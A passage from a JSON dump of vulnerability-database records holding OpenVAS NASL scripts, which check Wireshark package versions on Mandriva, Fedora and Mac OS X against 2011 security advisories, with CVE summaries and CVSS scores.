rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:53", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2011:083 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1590", "CVE-2011-1591"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831388", "href": "http://plugins.openvas.org/nasl.php?oid=831388", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2011:083 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This advisory updates wireshark to the latest version (1.2.16),\n fixing several security issues:\n\n The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x\n before 1.4.5 does not properly initialize certain global variables,\n which allows remote attackers to cause a denial of service (application\n crash) via a crafted .pcap file (CVE-2011-1590).\n \n Stack-based buffer overflow in the DECT dissector in\n epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows\n remote attackers to execute arbitrary code via a crafted .pcap file\n (CVE-2011-1591).\n \n The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x\n before 1.4.5 on Windows uses an incorrect integer data type during\n decoding of SETCLIENTID calls, which allows remote attackers to cause\n a denial of service (application crash) via a crafted .pcap file\n (CVE-2011-1592).\n \n The updated packages have been upgraded to the latest 1.2.x version\n (1.2.16) which is not vulnerable to these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-05/msg00004.php\");\n script_id(831388);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:083\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n script_name(\"Mandriva Update for wireshark MDVSA-2011:083 (wireshark)\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.16~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-03-15T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-2620", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-0713", "CVE-2011-1141", "CVE-2010-3445", "CVE-2011-1143", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-0538", "CVE-2011-1138"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310862907", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862907", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-2620\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055664.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862907\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-15 14:58:18 +0100 (Tue, 15 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-2620\");\n script_cve_id(\"CVE-2011-0538\", \"CVE-2010-3445\", \"CVE-2011-1143\", \"CVE-2011-1140\", \"CVE-2011-1141\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-0713\", \"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-2620\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:32", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-03-15T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-2620", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-0713", "CVE-2011-1141", "CVE-2010-3445", "CVE-2011-1143", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-0538", "CVE-2011-1138"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:862907", "href": "http://plugins.openvas.org/nasl.php?oid=862907", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-2620\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055664.html\");\n script_id(862907);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-15 14:58:18 +0100 (Tue, 15 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-2620\");\n script_cve_id(\"CVE-2011-0538\", \"CVE-2010-3445\", \"CVE-2011-1143\", \"CVE-2011-1140\", \"CVE-2011-1141\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-0713\", \"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-2620\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:42", "description": "This host is installed with Wireshark and is prone to buffer\n overflow vulnerability.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "openvas", "title": "Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2017-04-19T00:00:00", "id": "OPENVAS:903023", "href": "http://plugins.openvas.org/nasl.php?oid=903023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_dect_bof_vuln_macosx.nasl 5977 2017-04-19 09:02:22Z teissa $\n#\n# Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to cause buffer overflow and\n execute arbitrary code on the system.\n Impact Level: System/Application\";\ntag_affected = \"Wireshark version 1.4.0 through 1.4.4\";\ntag_insight = \"The flaw is due to error in the 'DECT' dissector when processing\n malformed data, which could allow code execution via malformed packets or\n a malicious PCAP file.\";\ntag_solution = \"Upgrade to the Wireshark version 1.4.5 or later,\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to buffer\n overflow vulnerability.\";\n\nif(description)\n{\n script_id(903023);\n script_version(\"$Revision: 5977 $\");\n script_cve_id(\"CVE-2011-1591\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-19 11:02:22 +0200 (Wed, 19 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-25 18:34:41 +0530 (Wed, 25 Apr 2012)\");\n script_name(\"Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/44172\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/66834\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/1022\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2011-06.html\");\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_require_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nwiresharkVer = \"\";\n\n## Get the version from KB\nwiresharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(!wiresharkVer){\n exit(0);\n}\n\n## Check for Wireshark Version\nif(version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-26T15:07:44", "description": "This host is installed with Wireshark and is prone to buffer\n overflow vulnerability.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "openvas", "title": "Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2020-04-22T00:00:00", "id": "OPENVAS:1361412562310903023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903023\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2011-1591\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-25 18:34:41 +0530 (Wed, 25 Apr 2012)\");\n script_name(\"Wireshark DECT Buffer Overflow Vulnerability (Mac OS X)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44172\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/66834\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/1022\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2011-06.html\");\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_mandatory_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to cause buffer overflow and\n execute arbitrary code on the system.\");\n script_tag(name:\"affected\", value:\"Wireshark version 1.4.0 through 1.4.4\");\n script_tag(name:\"insight\", value:\"The flaw is due to error in the 'DECT' dissector when processing\n malformed data, which could allow code execution via malformed packets or\n a malicious PCAP file.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.4.5 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to buffer\n overflow 